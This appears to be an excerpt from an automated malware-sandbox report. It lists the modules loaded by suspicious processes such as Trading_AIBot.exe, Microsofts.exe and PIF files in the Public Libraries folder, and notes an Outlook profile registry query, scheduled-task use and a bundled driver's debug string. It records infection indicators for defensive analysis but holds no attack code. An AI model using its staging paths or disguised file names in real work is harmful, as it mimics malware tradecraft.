Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msimg32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??????????.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: mscoree.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: version.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: textshaping.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: textinputframework.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: coreuicomponents.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: coremessaging.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: ntmarta.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: coremessaging.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msimg32.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Automated click: OK
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Automated click: OK
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PO_KB#67897.cmd

Static file information: File size 1367515 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmp
